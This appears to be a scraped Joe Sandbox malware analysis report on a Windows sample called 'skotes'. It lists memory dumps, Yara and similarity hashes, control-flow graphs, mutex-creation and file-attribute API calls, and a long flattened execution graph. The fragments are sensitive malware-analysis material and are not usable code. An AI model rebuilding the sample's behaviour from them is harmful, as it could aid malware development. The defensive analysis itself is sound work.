                                                                                                                                              • Associated: 00000001.00000002.1737935580.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737949609.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737963539.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737976569.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737989660.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738002438.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738015186.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738028581.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738084913.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738099533.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738113133.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738126850.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738140020.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738155793.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738169496.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738184429.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738197475.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 1464230837-3862687658
                                                                                                                                              • Opcode ID: 90761d2db65d46d898a096eb923a593e50ac1e1cfeb7ef2cc222fa50040e10b3
                                                                                                                                              • Instruction ID: d87d1cd4535982e580c995ec10167df4a758edc48df59e7b39c9ec3e9ccef524
                                                                                                                                              • Opcode Fuzzy Hash: 90761d2db65d46d898a096eb923a593e50ac1e1cfeb7ef2cc222fa50040e10b3
                                                                                                                                              • Instruction Fuzzy Hash: 9E3129717002009BEB18DB78DD89BADB761EBC6314F24863EE054A73D1C77D8991875A

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 202 40a682-40a6a2 206 40a6d0-40a6ec 202->206 207 40a6a4-40a6b0 202->207 210 40a71a-40a739 206->210 211 40a6ee-40a6fa 206->211 208 40a6b2-40a6c0 207->208 209 40a6c6-40a6cd call 41d663 207->209 208->209 212 40a949 208->212 209->206 216 40a767-40a916 call 4180c0 210->216 217 40a73b-40a747 210->217 214 40a710-40a717 call 41d663 211->214 215 40a6fc-40a70a 211->215 220 40a94e-40a994 call 436c6a Sleep CreateMutexA 212->220 221 40a949 call 436c6a 212->221 214->210 215->212 215->214 223 40a749-40a757 217->223 224 40a75d-40a764 call 41d663 217->224 234 40a996-40a998 220->234 235 40a9a7-40a9a8 220->235 221->220 223->212 223->224 224->216 234->235 236 40a99a-40a9a5 234->236 236->235
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 1464230837-3862687658
                                                                                                                                              • Opcode ID: a6ea2f7246cb63bb3ba03756c45b6dc858977f61678756bade2f052fac116b5d
                                                                                                                                              • Instruction ID: 402f7597f10c2c85c385bf451a204f21aec01570a39f3eb915b28904fe70b45e
                                                                                                                                              • Opcode Fuzzy Hash: a6ea2f7246cb63bb3ba03756c45b6dc858977f61678756bade2f052fac116b5d
                                                                                                                                              • Instruction Fuzzy Hash: A4312571B002009BEB18DB78CD89BAEB772DB86314F24863EE054A73D1C77D8990875A

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 238 409adc-409ae8 239 409aea-409af8 238->239 240 409afe-409d91 call 41d663 call 417a00 call 405c10 call 408b30 call 418220 call 417a00 call 405c10 call 408b30 call 418220 238->240 239->240 241 40a917 239->241 244 40a953-40a994 Sleep CreateMutexA 241->244 245 40a917 call 436c6a 241->245 249 40a996-40a998 244->249 250 40a9a7-40a9a8 244->250 245->244 249->250 252 40a99a-40a9a5 249->252 252->250
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1737727604.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737744010.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737758407.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737775519.000000000061D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737789418.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737803367.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737817369.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737837954.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737852394.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737865663.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737879466.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737893282.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737908217.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737922115.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737935580.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737949609.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737963539.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737976569.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737989660.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738002438.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738015186.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738028581.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738084913.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738099533.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738113133.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738126850.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738140020.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738155793.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738169496.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738184429.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738197475.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 1464230837-3862687658
                                                                                                                                              • Opcode ID: d8cf7d6589cc4423550e11dad017799740c3aae992c341a475274cce026c17d7
                                                                                                                                              • Instruction ID: 72c25ccc3c98b687f461c8a5614e9890d65ff7dd98d12d5d12a57dfed5dd64b6
                                                                                                                                              • Opcode Fuzzy Hash: d8cf7d6589cc4423550e11dad017799740c3aae992c341a475274cce026c17d7
                                                                                                                                              • Instruction Fuzzy Hash: 462137717042409BEB289F68DC89B6DB771EBC2310F20463FE408A73D1DB7D9991875A

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 306 40a856-40a86e 307 40a870-40a87c 306->307 308 40a89c-40a89e 306->308 309 40a892-40a899 call 41d663 307->309 310 40a87e-40a88c 307->310 311 40a8a0-40a8a7 308->311 312 40a8a9-40a8b1 call 407d30 308->312 309->308 310->309 313 40a94e-40a987 call 436c6a Sleep CreateMutexA 310->313 315 40a8eb-40a916 call 4180c0 311->315 322 40a8b3-40a8bb call 407d30 312->322 323 40a8e4-40a8e6 312->323 326 40a98e-40a994 313->326 322->323 330 40a8bd-40a8c5 call 407d30 322->330 323->315 328 40a996-40a998 326->328 329 40a9a7-40a9a8 326->329 328->329 332 40a99a-40a9a5 328->332 330->323 334 40a8c7-40a8cf call 407d30 330->334 332->329 334->323 338 40a8d1-40a8d9 call 407d30 334->338 338->323 341 40a8db-40a8e2 338->341 341->315
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 1464230837-3862687658
                                                                                                                                              • Opcode ID: 16e874b86d294c8dbc95263be5d20036760f62e1634f1376cb63d85bd758e359
                                                                                                                                              • Instruction ID: 65f7a11f8f5d9a7888932b6c96b400ff01250f41755c5f46970d0e4d3ddc698f
                                                                                                                                              • Opcode Fuzzy Hash: 16e874b86d294c8dbc95263be5d20036760f62e1634f1376cb63d85bd758e359
                                                                                                                                              • Instruction Fuzzy Hash: 1221607274430096FB24B769885A76E7261DF82300F34483FE544F63D1CB7D5891429F

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 283 40a34f-40a35b 284 40a371-40a39a call 41d663 283->284 285 40a35d-40a36b 283->285 291 40a3c8-40a916 call 4180c0 284->291 292 40a39c-40a3a8 284->292 285->284 286 40a93a 285->286 289 40a953-40a994 Sleep CreateMutexA 286->289 290 40a93a call 436c6a 286->290 297 40a996-40a998 289->297 298 40a9a7-40a9a8 289->298 290->289 294 40a3aa-40a3b8 292->294 295 40a3be-40a3c5 call 41d663 292->295 294->286 294->295 295->291 297->298 301 40a99a-40a9a5 297->301 301->298
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 0040A963
                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 1464230837-3862687658
                                                                                                                                              • Opcode ID: 1425c2742d253bcdab7a553ab4221dc652303d7b461d9b08eccbf9864a3c531a
                                                                                                                                              • Instruction ID: 788f5c7e75b265c863c5cbe6439b96c2a819d5d1061a0626877fcf6c47275106
                                                                                                                                              • Opcode Fuzzy Hash: 1425c2742d253bcdab7a553ab4221dc652303d7b461d9b08eccbf9864a3c531a
                                                                                                                                              • Instruction Fuzzy Hash: 602148727003009BEB189B68DC897ADB761DBD2311F24463FE408A77D0C77D5990835B
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 57040152-0
                                                                                                                                              • Opcode ID: 7a31e774ce5160496b868481ad1714a18b6c01a7f89619dc1ccf0676da36917e
                                                                                                                                              • Instruction ID: 2ceb4b633ad4a171d295bd911596fac7f10c239a595cf67c3a826b401b9ecef4
                                                                                                                                              • Opcode Fuzzy Hash: 7a31e774ce5160496b868481ad1714a18b6c01a7f89619dc1ccf0676da36917e
                                                                                                                                              • Instruction Fuzzy Hash: 9EA10170A01205AFDB10DF65C94579BBBA8FF18315F00817BE815EB381EB39EA44CB99
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _strrchr
                                                                                                                                              • String ID: vC
                                                                                                                                              • API String ID: 3213747228-1921080006
                                                                                                                                              • Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                              • Instruction ID: 8cae4ceb00b15cc6f8fe4719d8afecb37dc1afbf88934ae700027118ad1b5c75
                                                                                                                                              • Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                              • Instruction Fuzzy Hash: DEB1F3329046459FEB15CF28C8C27AEBBA5EF49344F24916BE855FB341D6389D02CB68
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 531285432-0
                                                                                                                                              • Opcode ID: 8fb497d2bd26701da310c8a10b06eb0e495a2980e837e3252cd03f3267250895
                                                                                                                                              • Instruction ID: 8ea58e001adf984e7c012f60bfadf62abbd4b5fd5d949d96f5012e2c2c88c0a4
                                                                                                                                              • Opcode Fuzzy Hash: 8fb497d2bd26701da310c8a10b06eb0e495a2980e837e3252cd03f3267250895
                                                                                                                                              • Instruction Fuzzy Hash: 08216275A00219AFDF00EFA5CC819FEB7B9EF08714F10006AF601B7291DB389D419BA5
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___free_lconv_mon
                                                                                                                                              • String ID: 8"F$`'F

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:6.1%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:1089
                                                                                                                                              Total number of Limit Nodes:103
35172->35173 35175 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35173->35175 35176 40a903 35174->35176 35177 40a94e 35175->35177 35178 40a953 Sleep CreateMutexA 35177->35178 35179 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35177->35179 35182 40a98e 35178->35182 35179->35178 35181 40a9a7 35182->35181 35185 436629 GetPEB GetPEB RtlAllocateHeap _unexpected 35182->35185 35184 40a9b0 35185->35184 35186 40e62d 35187 40e63b 35186->35187 35193 40e64f Concurrency::details::ResourceManager::Release 35186->35193 35188 40eab3 35187->35188 35187->35193 35189 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35188->35189 35224 40e83e 35188->35224 35189->35224 35190 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35191 40eabd 35190->35191 35192 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35191->35192 35194 40eac2 35192->35194 35196 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35193->35196 35195 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35194->35195 35197 40eb19 35195->35197 35198 40e7cb 35196->35198 35199 405c10 5 API calls 35197->35199 35200 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35198->35200 35201 40eb21 35199->35201 35202 40e7e0 35200->35202 35328 4183c0 35201->35328 35204 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35202->35204 35205 40e7f2 35204->35205 35207 40be30 12 API calls 35205->35207 35206 40eb36 35336 418220 35206->35336 35209 40e7fe 35207->35209 35211 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35209->35211 35210 40eb45 GetFileAttributesA 35217 40eb62 35210->35217 35213 40e813 35211->35213 35214 417a00 
Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35213->35214 35215 40e82b 35214->35215 35216 405c10 5 API calls 35215->35216 35218 40e832 35216->35218 35220 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35217->35220 35219 408580 2 API calls 35218->35219 35219->35224 35221 40ed60 35220->35221 35222 405c10 5 API calls 35221->35222 35223 40ed68 35222->35223 35225 4183c0 2 API calls 35223->35225 35224->35190 35229 40ea8f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release 35224->35229 35226 40ed7d 35225->35226 35227 418220 2 API calls 35226->35227 35228 40ed8c GetFileAttributesA 35227->35228 35233 40eda9 35228->35233 35231 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35231->35233 35232 40f699 Concurrency::details::ResourceManager::Release 35233->35231 35233->35232 35234 40f6cb 35233->35234 35235 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35234->35235 35236 40f6d0 35235->35236 35237 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35236->35237 35238 40f727 35237->35238 35239 405c10 5 API calls 35238->35239 35240 40f72e 35239->35240 35241 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35240->35241 35242 40f741 35241->35242 35243 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35242->35243 35244 40f756 35243->35244 35245 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35244->35245 35246 40f76b 35245->35246 35247 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35246->35247 35248 40f77d 35247->35248 35344 40e530 35248->35344 35250 40f786 35251 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35250->35251 35252 40f7aa 35251->35252 35253 417a00 
Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35252->35253 35254 40f7ba 35253->35254 35255 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35254->35255 35256 40f7d7 35255->35256 35257 4180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35256->35257 35259 40f7f0 35257->35259 35258 40f982 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release 35259->35258 35260 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35259->35260 35261 40f9b0 35260->35261 35262 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35261->35262 35263 40fa04 35262->35263 35264 405c10 5 API calls 35263->35264 35265 40fa0b 35264->35265 35266 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35265->35266 35267 40fa1e 35266->35267 35268 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35267->35268 35269 40fa33 35268->35269 35270 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35269->35270 35271 40fa48 35270->35271 35272 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35271->35272 35273 40fa5a 35272->35273 35274 40e530 14 API calls 35273->35274 35276 40fa63 35274->35276 35275 40fb35 Concurrency::details::ResourceManager::Release 35276->35275 35277 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35276->35277 35278 40fb54 35277->35278 35279 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35278->35279 35280 40fba5 35279->35280 35498 409580 5 API calls 3 library calls 35280->35498 35282 40fbb4 35499 409230 5 API calls 3 library calls 35282->35499 35284 40fbc3 35500 418320 35284->35500 35286 40fbdb 35286->35286 35287 4180c0 
Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35286->35287 35288 40fc8c 35287->35288 35289 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35288->35289 35290 40fca7 35289->35290 35291 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35290->35291 35292 40fcb9 35291->35292 35504 40c360 RtlAllocateHeap __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release Concurrency::details::_CancellationTokenState::_RegisterCallback 35292->35504 35294 40fcc2 35505 436729 35294->35505 35297 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35298 4105d4 35297->35298 35299 405c10 5 API calls 35298->35299 35300 4105db 35299->35300 35301 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35300->35301 35302 4105f1 35301->35302 35303 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35302->35303 35304 410609 35303->35304 35305 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35304->35305 35306 410621 35305->35306 35307 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35306->35307 35308 410633 35307->35308 35309 40e530 14 API calls 35308->35309 35311 41063c 35309->35311 35310 410880 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::ResourceManager::Release 35311->35310 35312 436c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 35311->35312 35313 4108d3 35312->35313 35314 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35313->35314 35315 410987 35314->35315 35316 405c10 5 API calls 35315->35316 35317 41098e 35316->35317 35318 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35317->35318 35319 4109a4 35318->35319 35320 417a00 
Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35319->35320 35321 4109bc 35320->35321 35322 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35321->35322 35323 4109d4 35322->35323 35324 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35323->35324 35325 4112e0 35324->35325 35326 40e530 14 API calls 35325->35326 35327 4112e9 35326->35327 35508 417760 35328->35508 35330 418439 35331 418454 __InternalCxxFrameHandler 35330->35331 35522 418f40 35330->35522 35333 418f40 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35331->35333 35335 4184a8 __InternalCxxFrameHandler 35331->35335 35334 4184ee 35333->35334 35334->35206 35335->35206 35337 418292 35336->35337 35338 418248 35336->35338 35342 418f40 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35337->35342 35343 4182a1 __InternalCxxFrameHandler 35337->35343 35338->35337 35339 418251 35338->35339 35340 419280 2 API calls 35339->35340 35341 41825a 35340->35341 35341->35210 35342->35343 35343->35210 35345 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35344->35345 35346 40e576 35345->35346 35347 405c10 5 API calls 35346->35347 35348 40e581 35347->35348 35349 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35348->35349 35350 40e59c 35349->35350 35351 405c10 5 API calls 35350->35351 35352 40e5a7 35351->35352 35353 419280 2 API calls 35352->35353 35354 40e5ba 35353->35354 35355 418320 2 API calls 35354->35355 35356 40e5fc 35355->35356 35357 418220 2 API calls 35356->35357 35358 40e60d 35357->35358 35359 418320 2 API calls 35358->35359 35360 40e61e 35359->35360 35361 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35360->35361 35362 40e7cb 35361->35362 35363 417a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 35362->35363 35364 40e7e0 
